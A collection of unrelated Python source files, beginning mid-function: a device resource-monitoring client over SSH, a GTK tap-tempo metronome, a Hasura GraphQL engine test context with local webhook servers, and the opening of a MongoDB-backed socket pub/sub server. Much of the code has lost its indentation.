            after = sum(list(ram_meas.values())[2:4]) / 2
        else:
            before = list(ram_meas.values())[0]
            after = list(ram_meas.values())[-1]
delta = thresholds["ram_delta"] / 100. * before
if after >= before + delta:
fail_msg = fail_msg + "RAM was not restored\nRAM before test {}; RAM after test {}\n".format(before, after)
failed = True
if failed:
raise RAMThresholdExceeded(fail_msg)
def assert_cpu(self, cpu_meas, thresholds):
"""
Verify that CPU resources on the DUT are not overutilized
"""
failed = False
total_overused = []
process_overused = {}
cpu_thresholds = "CPU thresholds: total - {}; per process - {}; average - {}\n".format(thresholds["cpu_total"],
thresholds["cpu_process"],
thresholds["cpu_total_average"])
average_cpu = "\n> Average CPU consumption during test run {}; Threshold - {}\n"
fail_msg = ""
total_sum = 0
t_format = "%Y-%m-%d %H:%M:%S"
        def handle_process_measurements(p_name, t_first, t_last, p_average):
            """Compose a fail message if a process overuses CPU during the 'cpu_measure_duration' interval."""
            msg_template = "> Process '{}'\nAverage CPU overuse {} during {} seconds\n{}"
            duration = (t_last - t_first).total_seconds()
            if duration >= thresholds["cpu_measure_duration"]:
                return msg_template.format(p_name,
                                           p_average,
                                           duration,
                                           "{} - {}\n".format(t_first.strftime(t_format),
                                                              t_last.strftime(t_format)))
            return ""
def handle_total_measurements(overused_list):
"""Compose fail message if CPU utilization exceeds threshold during 'duration' interval."""
fail_msg = ""
start = datetime.strptime(overused_list[0][0], t_format)
end = datetime.strptime(overused_list[-1][0], t_format)
if (end - start).total_seconds() >= thresholds["cpu_measure_duration"]:
fail_msg = "Total CPU overuse during {} seconds.\n{}\n\n".format((end - start).total_seconds(),
"\n".join([str(item) for item in overused_list])
)
del overused_list[0:]
return fail_msg
# Calculate total CPU utilization
for m_id, timestamp in enumerate(cpu_meas):
# Collect total CPU utilization to calculate total average
total_sum += cpu_meas[timestamp]["total"]
if cpu_meas[timestamp]["total"] > thresholds["cpu_total"]:
total_overused.append((timestamp, cpu_meas[timestamp]["total"]))
if m_id == (len(cpu_meas) - 1):
fail_msg += handle_total_measurements(total_overused)
total_overused = []
elif total_overused:
fail_msg += handle_total_measurements(total_overused)
total_overused = []
for process_consumption, process_name in cpu_meas[timestamp]["top_consumer"].items():
if process_consumption >= thresholds["cpu_process"]:
if process_name not in process_overused:
process_overused[process_name] = []
# Collect list of CPU utilization for specific process if CPU utilization exceeds threshold
process_overused[process_name].append((timestamp, process_consumption))
# Handle measurements per process
if process_overused:
for process_name, process_consumption in process_overused.items():
timestamps = []
process_sum = 0
for m_id, m_value in enumerate(process_consumption):
t_stamp = datetime.strptime(m_value[0], t_format)
process_sum += m_value[1]
if not timestamps:
timestamps.append(t_stamp)
continue
if (2 <= (t_stamp - timestamps[-1]).total_seconds() <= 3):
timestamps.append(t_stamp)
if m_id == (len(process_consumption) - 1):
fail_msg += handle_process_measurements(p_name=process_name,
t_first=timestamps[0],
t_last=timestamps[-1],
p_average=process_sum / len(timestamps))
else:
fail_msg += handle_process_measurements(p_name=process_name,
t_first=timestamps[0],
t_last=timestamps[-1],
p_average=process_sum / len(timestamps))
timestamps = []
process_sum = 0
# Calculate average CPU utilization
if (total_sum / len(cpu_meas)) > thresholds["cpu_total_average"]:
fail_msg += average_cpu.format(total_sum / len(cpu_meas), thresholds["cpu_total_average"])
if fail_msg:
raise CPUThresholdExceeded(cpu_thresholds + fail_msg)
class DUTMonitorClient(object):
"""
DUTMonitorClient object establish SSH connection with DUT. Keeps SSH connection with DUT during full test run.
Available features:
- start/stop hardware resources monitoring on DUT
- automatically restart monitoring script on the DUT in case of lose network connectivity (device reboot, etc.)
"""
def __init__(self, host, user, password):
self.running = False
self.user = user
self.password = password
self.host = host
self.init()
self.run_channel = None
self._thread = threading.Thread(name="Connection tracker", target=self._track_connection)
self._thread.setDaemon(True)
self._thread.start()
def _track_connection(self):
"""
        @summary: Track network connectivity. Reestablish the network connection in case it drops
"""
while True:
try:
self.ssh.exec_command("true", timeout=5)
except (paramiko.SSHException, AttributeError):
logger.warning("SSH connection dropped")
logger.debug("Trying to reconnect...")
self.close()
try:
self.init()
except Exception as err:
logger.debug(repr(err))
else:
if self.running:
self.start()
else:
time.sleep(5)
def _upload_to_dut(self):
"""
@summary: Upload 'dut_monitor.py' module to the DUT '/tmp' folder
"""
logger.debug("Uploading file to the DUT...")
with self.ssh.open_sftp() as sftp:
sftp.put(os.path.join(os.path.split(__file__)[0], "dut_monitor.py"), DUT_MONITOR)
def init(self):
"""
@summary: Connect to the DUT via SSH and authenticate to it.
"""
logger.debug("Trying to establish connection ...")
self.ssh = paramiko.SSHClient()
self.ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
self.ssh.connect(self.host, username=self.user, password=self.password, timeout=5)
def close(self):
"""
@summary: Close this SSHClient and its underlying Transport
"""
logger.debug("Close SSH connection with DUT")
self.ssh.close()
def exec_command(self, cmd, timeout=None):
"""
@summary: Execute a command on the DUT and track possible connectivity issues.
A new Channel is opened and the requested command is executed
"""
try:
return self.ssh.exec_command(cmd, timeout=timeout, get_pty=True)
except Exception as err:
logger.warning("Broken connection - {}".format(repr(err)))
logger.warning("Skip command {}".format(cmd))
return (None, None, None)
def start(self):
"""
@summary: Start HW resources monitoring on the DUT.
Write obtained values to the following files on the DUT: DUT_CPU_LOG, DUT_RAM_LOG, DUT_HDD_LOG
"""
self.running = True
self._upload_to_dut()
logger.debug("Start HW resources monitoring on the DUT...")
self.run_channel = self.ssh.get_transport().open_session()
self.run_channel.get_pty()
self.run_channel.settimeout(5)
# Start monitoring on DUT
self.run_channel.exec_command("python {} --start".format(DUT_MONITOR))
# Ensure monitoring started
output = self.run_channel.recv(1024)
if not "Started resources monitoring ..." in output:
raise Exception("Failed to start monitoring on DUT: {}".format(output))
def stop(self):
"""
@summary: Close this SSHClient and its underlying Transport
"""
self.running = False
logger.debug("Stop resources monitoring on the DUT...")
if not self.run_channel.closed:
self.run_channel.close()
def read_yml(self, file_pointer):
"""
@summary: Read yaml file content. Convert it to the ordered data.
@return: OrderedDict with sorted keys by timestamp, or empty dict for empty file.
"""
with file_pointer as fp:
measurements = yaml.safe_load("".join(fp))
if measurements is None:
return {}
        # Sort keys so logs are processed chronologically
        keys = sorted(measurements.keys())
key_value_pairs = [(item, measurements[item]) for item in keys]
return OrderedDict(key_value_pairs)
def get_log_files(self):
"""
@summary: Fetch monitoring logs from device, parse, convert to dictionary with sorted order.
@return: Dictionary with keys "cpu", "ram", "hdd", values contains appropriate measurements made on DUT.
"""
logger.debug("Downloading file from the DUT...")
        sftp = self.ssh.open_sftp()
        cpu_log_fp = sftp.file(DUT_CPU_LOG)
        ram_log_fp = sftp.file(DUT_RAM_LOG)
        hdd_log_fp = sftp.file(DUT_HDD_LOG)
cpu_meas = self.read_yml(cpu_log_fp)
ram_meas = self.read_yml(ram_log_fp)
hdd_meas = self.read_yml(hdd_log_fp)
return {"cpu": cpu_meas, "ram": ram_meas, "hdd": hdd_meas}
|
tempo.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Copyright (C) 2017 gumblex
# This program is free software. It comes without any warranty, to
# the extent permitted by applicable law. You can redistribute it
# and/or modify it under the terms of the Do What The Fuck You Want
# To Public License, Version 2, as published by Sam Hocevar. See
# http://www.wtfpl.net/ for more details.
import os
import io
import time
import threading
import collections
import gi
gi.require_version('Gtk', '3.0')
from gi.repository import Gtk
try:
import pyaudio
import wave
has_pyaudio = True
except ImportError:
has_pyaudio = False
class GridWindow(Gtk.Window):
def __init__(self):
Gtk.Window.__init__(self, title="Tempo")
self.set_border_width(10)
self.set_resizable(False)
grid = Gtk.Grid()
grid.set_row_spacing(6)
grid.set_column_spacing(10)
self.add(grid)
self.label1 = Gtk.Label(label="Measure")
self.label2 = Gtk.Label(label="Tempo×2")
self.label3 = Gtk.Label(label="BPM")
self.label4 = Gtk.Label(label="Metronome")
self.label1.set_halign(Gtk.Align.END)
self.label2.set_halign(Gtk.Align.END)
self.label3.set_halign(Gtk.Align.END)
self.label4.set_halign(Gtk.Align.END)
self.box2 = Gtk.Box()
self.box2.set_halign(Gtk.Align.START)
self.box4 = Gtk.Box()
self.box4.set_halign(Gtk.Align.START)
self.toggle_start = Gtk.ToggleButton(label="Active")
self.toggle_start.connect("toggled", self.on_button_toggled)
self.switch_x2 = Gtk.Switch()
self.switch_x2.set_active(False)
self.switch_x2.connect("notify::active", self.on_switch_activated)
self.adj_spin = Gtk.Adjustment(value=60, lower=30, upper=300, step_increment=1, page_increment=10, page_size=0)
self.spin_bpm = Gtk.SpinButton()
self.spin_bpm.set_adjustment(self.adj_spin)
self.adj_spin.set_value(60)
self.adj_spin.connect("value-changed", self.on_spin_changed)
self.switch_mt = Gtk.Switch()
self.switch_mt.set_active(False)
self.switch_mt.set_sensitive(False)
self.button_beat = Gtk.Button(label="Beat")
self.button_beat.set_sensitive(False)
self.button_beat.connect("clicked", self.on_beat)
grid.attach(self.label1, 0, 0, 1, 1)
grid.attach(self.label2, 0, 1, 1, 1)
grid.attach(self.label3, 0, 2, 1, 1)
grid.attach(self.label4, 0, 3, 1, 1)
grid.attach(self.toggle_start, 1, 0, 1, 1)
self.box2.pack_end(self.switch_x2, 1, 0, 0)
grid.attach(self.box2, 1, 1, 1, 1)
grid.attach(self.spin_bpm, 1, 2, 1, 1)
self.box4.pack_end(self.switch_mt, 1, 0, 0)
grid.attach(self.box4, 1, 3, 1, 1)
grid.attach(self.button_beat, 0, 4, 2, 1)
self.connect("delete-event", self.on_delete)
if has_pyaudio:
self.switch_mt.set_sensitive(True)
self.metronome = Metronome()
self.switch_mt.connect("notify::active", self.on_metronome_activated)
self.tempox = 1
self.lastbpm = 0
self.reset_state()
def reset_state(self):
self.intervals = collections.deque(maxlen=20)
self.lastbeat = 0
self.invalidbeats = 0
self.stabletimes = 0
def on_switch_activated(self, switch, gparam):
if self.switch_x2.get_active():
self.tempox = 2
self.adj_spin.set_value(self.adj_spin.get_value() * 2)
else:
self.tempox = 1
self.adj_spin.set_value(self.adj_spin.get_value() // 2)
def on_spin_changed(self, adjustment):
if has_pyaudio and self.switch_mt.get_active():
self.metronome.interval = 60 / self.adj_spin.get_value()
def on_metronome_activated(self, switch, gparam):
if self.switch_mt.get_active():
self.metronome.start(60 / self.adj_spin.get_value())
else:
self.metronome.stop()
def on_button_toggled(self, button):
if button.get_active():
state = "on"
self.switch_mt.set_active(False)
self.switch_mt.set_sensitive(False)
self.button_beat.set_sensitive(True)
self.button_beat.grab_focus()
else:
state = "off"
self.button_beat.set_sensitive(False)
if has_pyaudio:
self.switch_mt.set_sensitive(True)
self.reset_state()
def on_beat(self, button):
if self.invalidbeats > 4:
now = time.time()
self.intervals.append(now - self.lastbeat)
self.lastbeat = now
bpm = round(60 * len(self.intervals) * self.tempox / sum(self.intervals))
self.adj_spin.set_value(bpm)
if self.lastbpm == bpm:
self.stabletimes += 1
if self.stabletimes > 5:
self.toggle_start.set_active(False)
else:
self.stabletimes = 0
self.lastbpm = bpm
else:
self.lastbeat = time.time()
self.invalidbeats = self.invalidbeats + 1
def on_delete(self, widget, event):
if has_pyaudio:
self.metronome.close()
Gtk.main_quit()
class Metronome:
def __init__(self):
with open(os.path.join(os.path.dirname(__file__), 'click.wav'), 'rb') as f:
self.wave = io.BytesIO(f.read())
self.wf = wave.open(self.wave, 'rb')
self.pa = pyaudio.PyAudio()
self.start_time = 0
self.closing = False
self.interval = 0
self.sleep = time.sleep
self.thread = None
def tick(self):
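        # Play a single click: rewind the in-memory WAV and stream it through
        # a PyAudio callback, polling until playback finishes or stop()
        # clears start_time.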
def callback(in_data, frame_count, time_info, status):
data = self.wf.readframes(frame_count)
return (data, pyaudio.paContinue)
self.wf.rewind()
stream = self.pa.open(
format=self.pa.get_format_from_width(self.wf.getsampwidth()),
channels=self.wf.getnchannels(),
rate=self.wf.getframerate(),
output=True,
stream_callback=callback
)
stream.start_stream()
while stream.is_active() and self.start_time:
self.sleep(0.05)
stream.stop_stream()
stream.close()
def start(self, interval):
self.interval = interval
self.thread = threading.Thread(target=self.background)
self.thread.start()
def background(self):
self.start_time = time.monotonic()
while self.start_time:
self.tick()
self.sleep_interval(self.interval)
def sleep_interval(self, interval):
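        # Phase-locked sleep: wake at the next multiple of `interval` counted
        # from start_time so the beat does not drift. While more than 50 ms
        # remain it sleeps half the remaining delta; the final stretch is
        # busy-waited for better timing accuracy.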
now = time.monotonic()
preset = now + interval - ((now - self.start_time) % interval)
while self.start_time:
delta = preset - time.monotonic()
if delta <= 0:
return
elif delta >= 0.05:
time.sleep(delta/2)
def stop(self):
self.start_time = 0
def close(self):
self.stop()
self.sleep(0.01)
self.pa.terminate()
if __name__ == '__main__':
win = GridWindow()
win.show_all()
Gtk.main()
|
context.py
|
#!/usr/bin/env python3
from http import HTTPStatus
from socketserver import ThreadingMixIn
from urllib.parse import urlparse
from ruamel.yaml.comments import CommentedMap as OrderedDict # to avoid '!!omap' in yaml
import threading
import http.server
import json
import queue
import socket
import subprocess
import time
import string
import random
import os
import re
import ruamel.yaml as yaml
import requests
import websocket
from sqlalchemy import create_engine
from sqlalchemy.schema import MetaData
import graphql_server
import graphql
# pytest has removed the global pytest.config
# As a solution to this we are going to store it in PyTestConf.config
class PytestConf():
pass
class HGECtxError(Exception):
pass
class GQLWsClient():
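    # Runs a websocket-client WebSocketApp in a daemon thread; incoming
    # frames are routed to a per-query queue keyed by the frame 'id' (or to
    # the main ws_queue), while keep-alive ('ka') frames are dropped.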
def __init__(self, hge_ctx, endpoint):
self.hge_ctx = hge_ctx
self.ws_queue = queue.Queue(maxsize=-1)
self.ws_url = urlparse(hge_ctx.hge_url)._replace(scheme='ws',
path=endpoint)
self.create_conn()
def create_conn(self):
self.ws_queue.queue.clear()
self.ws_id_query_queues = dict()
self.ws_active_query_ids = set()
self.connected_event = threading.Event()
self.init_done = False
self.is_closing = False
self.remote_closed = False
self._ws = websocket.WebSocketApp(self.ws_url.geturl(),
on_open=self._on_open, on_message=self._on_message, on_close=self._on_close)
self.wst = threading.Thread(target=self._ws.run_forever)
self.wst.daemon = True
self.wst.start()
def recreate_conn(self):
self.teardown()
self.create_conn()
def wait_for_connection(self, timeout=10):
assert not self.is_closing
assert self.connected_event.wait(timeout=timeout)
def get_ws_event(self, timeout):
return self.ws_queue.get(timeout=timeout)
def has_ws_query_events(self, query_id):
return not self.ws_id_query_queues[query_id].empty()
def get_ws_query_event(self, query_id, timeout):
return self.ws_id_query_queues[query_id].get(timeout=timeout)
def send(self, frame):
self.wait_for_connection()
if frame.get('type') == 'stop':
            self.ws_active_query_ids.discard(frame.get('id'))
elif frame.get('type') == 'start' and 'id' in frame:
self.ws_id_query_queues[frame['id']] = queue.Queue(maxsize=-1)
self._ws.send(json.dumps(frame))
def init_as_admin(self):
headers={}
if self.hge_ctx.hge_key:
headers = {'x-hasura-admin-secret': self.hge_ctx.hge_key}
self.init(headers)
def init(self, headers={}):
payload = {'type': 'connection_init', 'payload': {}}
if headers and len(headers) > 0:
payload['payload']['headers'] = headers
self.send(payload)
ev = self.get_ws_event(3)
assert ev['type'] == 'connection_ack', ev
self.init_done = True
def stop(self, query_id):
data = {'id': query_id, 'type': 'stop'}
self.send(data)
self.ws_active_query_ids.discard(query_id)
def gen_id(self, size=6, chars=string.ascii_letters + string.digits):
new_id = ''.join(random.choice(chars) for _ in range(size))
if new_id in self.ws_active_query_ids:
return self.gen_id(size, chars)
return new_id
def send_query(self, query, query_id=None, headers={}, timeout=60):
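        # Generator: registers the query id, sends the start frame, then
        # yields every event the server pushes for that id until the caller
        # stops iterating.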
graphql.parse(query['query'])
        if headers and len(headers) > 0:
            # Do init if headers are provided
            self.init(headers)
        elif not self.init_done:
            self.init()
        if query_id is None:
query_id = self.gen_id()
frame = {
'id': query_id,
'type': 'start',
'payload': query,
}
self.ws_active_query_ids.add(query_id)
self.send(frame)
while True:
yield self.get_ws_query_event(query_id, timeout)
def _on_open(self):
if not self.is_closing:
self.connected_event.set()
def _on_message(self, message):
# NOTE: make sure we preserve key ordering so we can test the ordering
# properties in the graphql spec properly
json_msg = json.loads(message, object_pairs_hook=OrderedDict)
if 'id' in json_msg:
query_id = json_msg['id']
            if json_msg.get('type') == 'stop':
                # Remove from the active queries list
                self.ws_active_query_ids.discard(query_id)
            if query_id not in self.ws_id_query_queues:
                self.ws_id_query_queues[query_id] = queue.Queue(maxsize=-1)
            # Put the event in the corresponding query queue
            self.ws_id_query_queues[query_id].put(json_msg)
        elif json_msg['type'] != 'ka':
            # Put the event in the main queue
            self.ws_queue.put(json_msg)
def _on_close(self):
self.remote_closed = True
self.init_done = False
def teardown(self):
self.is_closing = True
if not self.remote_closed:
self._ws.close()
self.wst.join()
class ActionsWebhookHandler(http.server.BaseHTTPRequestHandler):
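    # Test double for a Hasura actions webhook: dispatches on the request
    # path and answers with (body, status) pairs, calling back into
    # graphql-engine through hge_ctx for the mutations/queries it performs.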
def do_GET(self):
self.send_response(HTTPStatus.OK)
self.end_headers()
def do_POST(self):
content_len = self.headers.get('Content-Length')
req_body = self.rfile.read(int(content_len)).decode("utf-8")
self.req_json = json.loads(req_body)
req_headers = self.headers
req_path = self.path
self.log_message(json.dumps(self.req_json))
if req_path == "/create-user":
resp, status = self.create_user()
self._send_response(status, resp)
elif req_path == "/create-user-timeout":
time.sleep(3)
resp, status = self.create_user()
self._send_response(status, resp)
elif req_path == "/create-users":
resp, status = self.create_users()
self._send_response(status, resp)
elif req_path == "/invalid-response":
self._send_response(HTTPStatus.OK, "some-string")
elif req_path == "/mirror-action":
resp, status = self.mirror_action()
self._send_response(status, resp)
elif req_path == "/get-user-by-email":
resp, status = self.get_users_by_email(True)
self._send_response(status, resp)
elif req_path == "/get-users-by-email":
resp, status = self.get_users_by_email(False)
self._send_response(status, resp)
else:
self.send_response(HTTPStatus.NO_CONTENT)
self.end_headers()
def create_user(self):
email_address = self.req_json['input']['email']
name = self.req_json['input']['name']
if not self.check_email(email_address):
response = {
'message': 'Given email address is not valid',
'code': 'invalid-email'
}
return response, HTTPStatus.BAD_REQUEST
gql_query = '''
mutation ($email: String! $name: String!) {
insert_user_one(object: {email: $email, name: $name}){
id
}
}
'''
query = {
'query': gql_query,
'variables': {
'email': email_address,
'name': name
}
}
code, resp = self.execute_query(query)
if code != 200 or 'data' not in resp:
response = {
'message': 'GraphQL query execution failed',
'code': 'unexpected'
}
return response, HTTPStatus.BAD_REQUEST
response = resp['data']['insert_user_one']
return response, HTTPStatus.OK
def create_users(self):
inputs = self.req_json['input']['users']
        for user_input in inputs:
            email_address = user_input['email']
if not self.check_email(email_address):
response = {
'message': 'Email address is not valid: ' + email_address,
'code': 'invalid-email'
}
return response, HTTPStatus.BAD_REQUEST
gql_query = '''
mutation ($insert_inputs: [user_insert_input!]!){
insert_user(objects: $insert_inputs){
returning{
id
}
}
}
'''
query = {
'query': gql_query,
'variables': {
'insert_inputs': inputs
}
}
code, resp = self.execute_query(query)
if code != 200 or 'data' not in resp:
response = {
'message': 'GraphQL query execution failed',
'code': 'unexpected'
}
return response, HTTPStatus.BAD_REQUEST
response = resp['data']['insert_user']['returning']
return response, HTTPStatus.OK
def mirror_action(self):
response = self.req_json['input']['arg']
return response, HTTPStatus.OK
    def get_users_by_email(self, singleUser=False):
email = self.req_json['input']['email']
if not self.check_email(email):
response = {
'message': 'Given email address is not valid',
'code': 'invalid-email'
}
return response, HTTPStatus.BAD_REQUEST
gql_query = '''
query get_user($email:String!) {
user(where:{email:{_eq:$email}},order_by: {id: asc}) {
id
}
}
'''
query = {
'query': gql_query,
'variables':{
'email':email
}
}
        code, resp = self.execute_query(query)
if code != 200 or 'data' not in resp:
response = {
'message': 'GraphQL query execution failed',
'code': 'unexpected'
}
return response, HTTPStatus.BAD_REQUEST
if singleUser:
return resp['data']['user'][0], HTTPStatus.OK
else:
return resp['data']['user'], HTTPStatus.OK
    def check_email(self, email):
        regex = r'^\w+([\.-]?\w+)*@\w+([\.-]?\w+)*(\.\w{2,3})+$'
        return re.search(regex, email)
def execute_query(self, query):
headers = {}
admin_secret = self.hge_ctx.hge_key
if admin_secret is not None:
headers['X-Hasura-Admin-Secret'] = admin_secret
code, resp, _ = self.hge_ctx.anyq('/v1/graphql', query, headers)
self.log_message(json.dumps(resp))
return code, resp
def _send_response(self, status, body):
self.log_request(status)
self.send_response_only(status)
self.send_header('Content-Type', 'application/json')
self.send_header('Set-Cookie', 'abcd')
self.end_headers()
self.wfile.write(json.dumps(body).encode("utf-8"))
class ActionsWebhookServer(http.server.HTTPServer):
def __init__(self, hge_ctx, server_address):
handler = ActionsWebhookHandler
handler.hge_ctx = hge_ctx
super().__init__(server_address, handler)
def server_bind(self):
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.socket.bind(self.server_address)
class EvtsWebhookHandler(http.server.BaseHTTPRequestHandler):
def do_GET(self):
self.send_response(HTTPStatus.OK)
self.end_headers()
def do_POST(self):
content_len = self.headers.get('Content-Length')
req_body = self.rfile.read(int(content_len)).decode("utf-8")
req_json = json.loads(req_body)
req_headers = self.headers
req_path = self.path
self.log_message(json.dumps(req_json))
if req_path == "/fail":
self.send_response(HTTPStatus.INTERNAL_SERVER_ERROR)
self.end_headers()
# This endpoint just sleeps for 2 seconds:
elif req_path == "/sleep_2s":
time.sleep(2)
self.send_response(HTTPStatus.NO_CONTENT)
self.end_headers()
# This is like a sleep endpoint above, but allowing us to decide
# externally when the webhook can return, with unblock()
elif req_path == "/block":
if not self.server.unblocked:
self.server.blocked_count += 1
with self.server.unblocked_wait:
# We expect this timeout never to be reached, but if
# something goes wrong the main thread will block forever:
self.server.unblocked_wait.wait(timeout=60)
self.server.blocked_count -= 1
self.send_response(HTTPStatus.NO_CONTENT)
self.end_headers()
else:
self.send_response(HTTPStatus.NO_CONTENT)
self.end_headers()
self.server.resp_queue.put({"path": req_path,
"body": req_json,
"headers": req_headers})
# A very slightly more sane/performant http server.
# See: https://stackoverflow.com/a/14089457/176841
#
# TODO use this elsewhere, or better yet: use e.g. bottle + waitress
class ThreadedHTTPServer(ThreadingMixIn, http.server.HTTPServer):
"""Handle requests in a separate thread."""
class EvtsWebhookServer(ThreadedHTTPServer):
def __init__(self, server_address):
# Data received from hasura by our web hook, pushed after it returns to the client:
self.resp_queue = queue.Queue()
# We use these two vars to coordinate unblocking in the /block route
self.unblocked = False
self.unblocked_wait = threading.Condition()
# ...and this for bookkeeping open blocked requests; this becomes
# meaningless after the first call to unblock()
self.blocked_count = 0
super().__init__(server_address, EvtsWebhookHandler)
# Unblock all webhook requests to /block. Idempotent.
def unblock(self):
self.unblocked = True
with self.unblocked_wait:
# NOTE: this only affects currently wait()-ing threads, future
# wait()s will block again (hence the simple self.unblocked flag)
self.unblocked_wait.notify_all()
def server_bind(self):
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.socket.bind(self.server_address)
def get_event(self, timeout):
return self.resp_queue.get(timeout=timeout)
    def is_queue_empty(self):
        return self.resp_queue.empty()
    def teardown(self):
        self.shutdown()
        self.server_close()
class HGECtxGQLServer:
def __init__(self, hge_urls, port=5000):
# start the graphql server
self.port = port
self._hge_urls = hge_urls
self.is_running = False
self.start_server()
def start_server(self):
if not self.is_running:
self.graphql_server = graphql_server.create_server('127.0.0.1', self.port)
self.hge_urls = graphql_server.set_hge_urls(self._hge_urls)
self.gql_srvr_thread = threading.Thread(target=self.graphql_server.serve_forever)
self.gql_srvr_thread.start()
self.is_running = True
def teardown(self):
self.stop_server()
def stop_server(self):
if self.is_running:
graphql_server.stop_server(self.graphql_server)
self.gql_srvr_thread.join()
self.is_running = False
class HGECtx:
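    # Per-test-session context: bundles an HTTP session, GraphQL websocket
    # clients, a SQLAlchemy engine for direct DB access, and the pytest CLI
    # options that configure the graphql-engine instance under test.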
def __init__(self, hge_url, pg_url, config):
self.http = requests.Session()
self.hge_key = config.getoption('--hge-key')
self.hge_url = hge_url
self.pg_url = pg_url
self.hge_webhook = config.getoption('--hge-webhook')
hge_jwt_key_file = config.getoption('--hge-jwt-key-file')
if hge_jwt_key_file is None:
self.hge_jwt_key = None
else:
with open(hge_jwt_key_file) as f:
self.hge_jwt_key = f.read()
self.hge_jwt_conf = config.getoption('--hge-jwt-conf')
if self.hge_jwt_conf is not None:
self.hge_jwt_conf_dict = json.loads(self.hge_jwt_conf)
self.webhook_insecure = config.getoption('--test-webhook-insecure')
self.metadata_disabled = config.getoption('--test-metadata-disabled')
self.may_skip_test_teardown = False
self.function_permissions = config.getoption('--test-function-permissions')
# This will be GC'd, but we also explicitly dispose() in teardown()
self.engine = create_engine(self.pg_url)
self.meta = MetaData()
self.ws_read_cookie = config.getoption('--test-ws-init-cookie')
self.hge_scale_url = config.getoption('--test-hge-scale-url')
self.avoid_err_msg_checks = config.getoption('--avoid-error-message-checks')
self.inherited_roles_tests = config.getoption('--test-inherited-roles')
self.pro_tests = config.getoption('--pro-tests')
self.ws_client = GQLWsClient(self, '/v1/graphql')
self.ws_client_v1alpha1 = GQLWsClient(self, '/v1alpha1/graphql')
self.ws_client_relay = GQLWsClient(self, '/v1beta1/relay')
self.backend = config.getoption('--backend')
self.default_backend = 'postgres'
self.is_default_backend = self.backend == self.default_backend
# HGE version
result = subprocess.run(['../../scripts/get-version.sh'], shell=False, stdout=subprocess.PIPE, check=True)
env_version = os.getenv('VERSION')
self.version = env_version if env_version else result.stdout.decode('utf-8').strip()
if self.is_default_backend and not self.metadata_disabled and not config.getoption('--skip-schema-setup'):
try:
st_code, resp = self.v2q_f("queries/" + self.backend_suffix("clear_db")+ ".yaml")
except requests.exceptions.RequestException as e:
self.teardown()
raise HGECtxError(repr(e))
assert st_code == 200, resp
# Postgres version
if self.is_default_backend:
pg_version_text = self.sql('show server_version_num').fetchone()['server_version_num']
self.pg_version = int(pg_version_text)
def reflect_tables(self):
self.meta.reflect(bind=self.engine)
def anyq(self, u, q, h, b = None, v = None):
resp = None
if v == 'GET':
resp = self.http.get(
self.hge_url + u,
headers=h
)
elif v == 'POST' and b:
# TODO: Figure out why the requests are failing with a byte object passed in as `data`
resp = self.http.post(
self.hge_url + u,
data=b,
headers=h
)
elif v == 'PATCH' and b:
resp = self.http.patch(
self.hge_url + u,
data=b,
headers=h
)
elif v == 'PUT' and b:
resp = self.http.put(
self.hge_url + u,
data=b,
headers=h
)
elif v == 'DELETE':
resp = self.http.delete(
self.hge_url + u,
headers=h
)
else:
resp = self.http.post(
self.hge_url + u,
json=q,
headers=h
)
# NOTE: make sure we preserve key ordering so we can test the ordering
# properties in the graphql spec properly
# Returning response headers to get the request id from response
return resp.status_code, resp.json(object_pairs_hook=OrderedDict), resp.headers
def sql(self, q):
conn = self.engine.connect()
res = conn.execute(q)
conn.close()
return res
def execute_query(self, q, url_path, headers = {}):
h = headers.copy()
if self.hge_key is not None:
h['X-Hasura-Admin-Secret'] = self.hge_key
resp = self.http.post(
self.hge_url + url_path,
json=q,
headers=h
)
# NOTE: make sure we preserve key ordering so we can test the ordering
# properties in the graphql spec properly
return resp.status_code, resp.json(object_pairs_hook=OrderedDict)
def v1q(self, q, headers = {}):
return self.execute_query(q, "/v1/query", headers)
def v1q_f(self, fn):
with open(fn) as f:
# NOTE: preserve ordering with ruamel
yml = yaml.YAML()
return self.v1q(yml.load(f))
def v2q(self, q, headers = {}):
return self.execute_query(q, "/v2/query", headers)
def v2q_f(self, fn):
with open(fn) as f:
# NOTE: preserve ordering with ruamel
yml = yaml.YAML()
return self.v2q(yml.load(f))
def backend_suffix(self, filename):
if self.is_default_backend:
return filename
else:
return filename + "_" + self.backend
def v1metadataq(self, q, headers = {}):
return self.execute_query(q, "/v1/metadata", headers)
def v1metadataq_f(self, fn):
with open(fn) as f:
# NOTE: preserve ordering with ruamel
yml = yaml.YAML()
return self.v1metadataq(yml.load(f))
def teardown(self):
self.http.close()
self.engine.dispose()
# Close websockets:
self.ws_client.teardown()
self.ws_client_v1alpha1.teardown()
self.ws_client_relay.teardown()
    def v1GraphqlExplain(self, q, hdrs=None):
        headers = {}
        if hdrs is not None:
            headers = hdrs
        if self.hge_key is not None:
            headers['X-Hasura-Admin-Secret'] = self.hge_key
resp = self.http.post(self.hge_url + '/v1/graphql/explain', json=q, headers=headers)
return resp.status_code, resp.json()
|
server.py
|
import socket
from threading import Thread
from datetime import datetime
from pymongo import MongoClient
class Server:
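    # Line-oriented TCP pub/sub server with optional MongoDB-backed keyword
    # storage. Clients send "command arg1 arg2 ..." frames; spaces inside
    # values are escaped with the configured spacer string.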
def __init__(self, address: str, port: int, spacer:str=",", log:str=None, mongo:tuple=("", 0)):
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.bind((address, port))
self.sock.listen()
self.stop = False
self.mongo = True
        try:
            self.db = MongoClient(host=mongo[0], port=mongo[1]).degeerella
            self.db.profiling_info()
        except Exception:
            self.mongo = False
self.version = "1.2"
self._log = log
self.connections = dict()
self.cCounter = 0
self.spacer = spacer.replace(" ", "")
self.subscriptions = dict()
self.subscriptionAlert = []
self.subscriptionRegistered = dict()
self.log(f"started | mongo: {self.mongo}")
def listen(self, thread=False):
if thread: Thread(target=self._listen, daemon=True).start()
else: self._listen()
def _listen(self):
while not self.stop:
try:
connection, address = self.sock.accept()
self.cCounter += 1
self.log(f"id {self.cCounter} connected : {address[0]}")
self.connections[self.cCounter] = connection
self.subscriptions[self.cCounter] = []
Thread(target=self.interact, daemon=True, args=(address, self.cCounter)).start()
except KeyboardInterrupt: break
def interact(self, address, id):
connection = self.connections[id]
self.sendInfos(id)
try:
while not self.stop:
data = connection.recv(1024)
if not data: break
self.log(f"received '{data.decode()}' from id {id}")
if data == b"disconnect": break
self.process(data.decode(), id)
except KeyboardInterrupt: pass
